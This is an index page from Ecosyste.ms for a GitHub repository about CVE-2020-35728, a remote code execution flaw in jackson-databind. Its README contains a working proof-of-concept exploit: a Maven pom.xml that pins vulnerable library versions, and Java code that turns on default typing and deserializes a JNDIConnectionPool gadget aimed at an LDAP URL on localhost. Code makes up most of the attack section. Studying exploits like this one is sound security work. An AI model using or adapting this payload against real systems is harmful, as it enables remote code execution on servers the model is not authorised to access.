Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Al1ex/CVE-2020-35728
CVE-2020-35728 & Jackson-databind RCE
https://github.com/Al1ex/CVE-2020-35728
cve-2020-35728 jackson-databind rce
Last synced: 3 months ago
JSON representation
CVE-2020-35728 & Jackson-databind RCE
- Host: GitHub
- URL: https://github.com/Al1ex/CVE-2020-35728
- Owner: Al1ex
- Created: 2020-12-31T01:55:39.000Z (almost 4 years ago)
- Default Branch: main
- Last Pushed: 2020-12-31T01:56:18.000Z (almost 4 years ago)
- Last Synced: 2024-05-02T18:51:15.427Z (6 months ago)
- Topics: cve-2020-35728, jackson-databind, rce
- Homepage:
- Size: 916 KB
- Stars: 42
- Watchers: 2
- Forks: 7
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - Al1ex/CVE-2020-35728 - CVE-2020-35728 & Jackson-databind RCE (Others)
README
### Description
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl).
### How to RCE
pom.xml
```
4.0.0
com.jacksonTest
jacksonTest
1.0-SNAPSHOT
com.fasterxml.jackson.core
jackson-databind
2.9.10.7
org.glassfish.web
jakarta.servlet.jsp.jstl
2.0.0
org.slf4j
slf4j-nop
1.7.2
javax.transaction
jta
1.1
```
poc.java
~~~
import com.fasterxml.jackson.databind.ObjectMapper;
public class POC {
public static void main(String[] args) throws Exception {
String payload = "[\"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1088/Exploit\"}]";
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
Object obj = mapper.readValue(payload, Object.class);
mapper.writeValueAsString(obj);
}
}
~~~
result
